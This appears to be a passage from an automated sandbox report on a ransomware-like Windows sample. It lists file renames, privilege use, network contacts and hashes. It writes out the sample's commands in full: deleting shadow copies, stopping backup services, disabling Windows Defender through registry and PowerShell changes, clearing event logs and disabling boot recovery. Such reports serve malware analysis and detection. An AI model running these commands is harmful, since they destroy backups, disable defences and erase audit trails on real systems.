| File opened for modification | C:\Program Files\7-Zip\Lang\ext.txt.VNRwpfAl5VlChrZtj1ZDOUMB0FUOWDSC8NLPVADaFp7_gfJCdcBmNiM0.f1cbq | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\kk.txt.VNRwpfAl5VlChrZtj1ZDOUMB0FUOWDSC8NLPVADaFp7_XZaaja52vHI0.f1cbq | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\System\Ole DB\ja-JP\msdasqlr.dll.mui | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\System\msadc\en-US\msdaremr.dll.mui | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.browser.attach.zh_CN_5.5.0.165303.jar.VNRwpfAl5VlChrZtj1ZDOUMB0FUOWDSC8NLPVADaFp7_WrqVk9W0Ljo0.f1cbq | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\System\Ole DB\es-ES\oledb32r.dll.mui.VNRwpfAl5VlChrZtj1ZDOUMB0FUOWDSC8NLPVADaFp7_9HdppsSj-1Y0.f1cbq | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\symbols\ea-sym.xml | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\microsoft shared\ink\ja-JP\FlickLearningWizard.exe.mui | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\jre\lib\management\snmp.acl.template.VNRwpfAl5VlChrZtj1ZDOUMB0FUOWDSC8NLPVADaFp7_uEdtgzlORy00.f1cbq | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\System\msadc\ja-JP\msaddsr.dll.mui | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\jre\COPYRIGHT.VNRwpfAl5VlChrZtj1ZDOUMB0FUOWDSC8NLPVADaFp7_DcjhVxajwBQ0.f1cbq | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.mbeanbrowser.ja_5.5.0.165303.jar.VNRwpfAl5VlChrZtj1ZDOUMB0FUOWDSC8NLPVADaFp7_U6QuQEubYv00.f1cbq | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\jre\lib\security\javaws.policy.VNRwpfAl5VlChrZtj1ZDOUMB0FUOWDSC8NLPVADaFp7_50vkuL919wQ0.f1cbq | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\feature.xml.VNRwpfAl5VlChrZtj1ZDOUMB0FUOWDSC8NLPVADaFp7_PoeYUHXaXaw0.f1cbq | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\System\Ole DB\ja-JP\oledb32r.dll.mui | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\microsoft shared\ink\en-US\boxed-join.avi | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\osknav\osknavbase.xml | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\microsoft shared\ink\sr-Latn-RS\tipresx.dll.mui | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\jre\lib\images\cursors\cursors.properties.VNRwpfAl5VlChrZtj1ZDOUMB0FUOWDSC8NLPVADaFp7_wh4NRhQ-t3Y0.f1cbq | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.rcp_4.4.0.v20141007-2301\feature.properties.VNRwpfAl5VlChrZtj1ZDOUMB0FUOWDSC8NLPVADaFp7_0eJdgl4Lss40.f1cbq | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\osknumpad\osknumpadbase.xml | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\db\bin\NetworkServerControl.VNRwpfAl5VlChrZtj1ZDOUMB0FUOWDSC8NLPVADaFp7_Nop_iPUPw0k0.f1cbq | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\jawt.lib.VNRwpfAl5VlChrZtj1ZDOUMB0FUOWDSC8NLPVADaFp7_FM9t8nAPi6E0.f1cbq | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\META-INF\ECLIPSE_.RSA.VNRwpfAl5VlChrZtj1ZDOUMB0FUOWDSC8NLPVADaFp7_Mk5azhiaB2M0.f1cbq | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\System\Ole DB\es-ES\msdasqlr.dll.mui | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\System\Ole DB\de-DE\sqlxmlx.rll.mui.VNRwpfAl5VlChrZtj1ZDOUMB0FUOWDSC8NLPVADaFp7_qR6mQxCOL5A0.f1cbq | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116\feature.properties.VNRwpfAl5VlChrZtj1ZDOUMB0FUOWDSC8NLPVADaFp7_avUMWFQQroM0.f1cbq | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\microsoft shared\ink\en-GB\tipresx.dll.mui | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\jre\lib\management\jmxremote.password.template.VNRwpfAl5VlChrZtj1ZDOUMB0FUOWDSC8NLPVADaFp7_9ZisnEOs8hc0.f1cbq | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.browser_5.5.0.165303.jar.VNRwpfAl5VlChrZtj1ZDOUMB0FUOWDSC8NLPVADaFp7_SIgtDRGeLD40.f1cbq | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\microsoft shared\Stationery\Peacock.jpg | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\jconsole.jar.VNRwpfAl5VlChrZtj1ZDOUMB0FUOWDSC8NLPVADaFp7_2aQJvxbruGM0.f1cbq | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\feature.properties.VNRwpfAl5VlChrZtj1ZDOUMB0FUOWDSC8NLPVADaFp7_KPIpt5M6MgI0.f1cbq | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.flightrecorder.controlpanel.ui.ja_5.5.0.165303.jar.VNRwpfAl5VlChrZtj1ZDOUMB0FUOWDSC8NLPVADaFp7_lrNLSGqd-N40.f1cbq | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
Launches sc.exe
Interacts with shadow copies
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\vssadmin.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\EPP | C:\Windows\SYSTEM32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\EPP | C:\Windows\SYSTEM32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\ContextMenuHandlers\EPP | C:\Windows\SYSTEM32\reg.exe | N/A |
Runs net.exe
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SYSTEM32\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SYSTEM32\wevtutil.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SYSTEM32\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SYSTEM32\wevtutil.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SYSTEM32\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SYSTEM32\wevtutil.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe
"C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe"
C:\Windows\SYSTEM32\net.exe
net.exe stop "SamSs" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SamSs" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "SDRSVC" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SDRSVC" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "SstpSvc" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SstpSvc" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "UI0Detect" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "UI0Detect" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "vmicvss" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "vmicvss" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "VSS" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "VSS" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "wbengine" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "wbengine" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "WebClient" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "WebClient" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "UnistoreSvc_1509d" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "UnistoreSvc_1509d" /y
C:\Windows\SYSTEM32\sc.exe
sc.exe config "SamSs" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "SDRSVC" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "SstpSvc" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "UI0Detect" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "vmicvss" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "VSS" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "wbengine" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "WebClient" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "UnistoreSvc_1509d" start= disabled
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\SYSTEM32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
C:\Windows\SYSTEM32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
C:\Windows\SYSTEM32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
C:\Windows\SYSTEM32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
C:\Windows\SYSTEM32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SYSTEM32\vssadmin.exe
vssadmin.exe delete shadows /all /quiet
C:\Windows\SYSTEM32\wevtutil.exe
wevtutil.exe cl system
C:\Windows\SYSTEM32\wevtutil.exe
wevtutil.exe cl security
C:\Windows\SYSTEM32\wevtutil.exe
wevtutil.exe cl application
C:\Windows\System32\Wbem\wmic.exe
wmic.exe SHADOWCOPY /nointeractive
C:\Windows\System32\Wbem\wmic.exe
wmic.exe shadowcopy delete
C:\Windows\SYSTEM32\bcdedit.exe
bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
C:\Windows\SYSTEM32\bcdedit.exe
bcdedit.exe /set {default} recoveryenabled no
C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
C:\Program Files\Windows Defender\MpCmdRun.exe
"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIOAVProtection $true
C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableRealtimeMonitoring $true
Network
| Country | Destination | Domain | Proto |
| IE | 52.109.76.32:443 | | tcp |
| US | 8.8.8.8:53 | time.windows.com | udp |
| US | 168.61.215.74:123 | time.windows.com | udp |
| US | 8.247.211.254:80 | | tcp |
Files
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 8592ba100a78835a6b94d5949e13dfc1 |
| SHA1 | 63e901200ab9a57c7dd4c078d7f75dcd3b357020 |
| SHA256 | fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c |
| SHA512 | 87f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | d22c3c303e60e811ce6c1b56870fcd88 |
| SHA1 | 2c670ff650f0a73d506bd4183f6a2098bce02ef8 |
| SHA256 | 5cd43cbcab810b57561cb15a0568e0cb08ca0b371efcdd27066cd818f1b40728 |
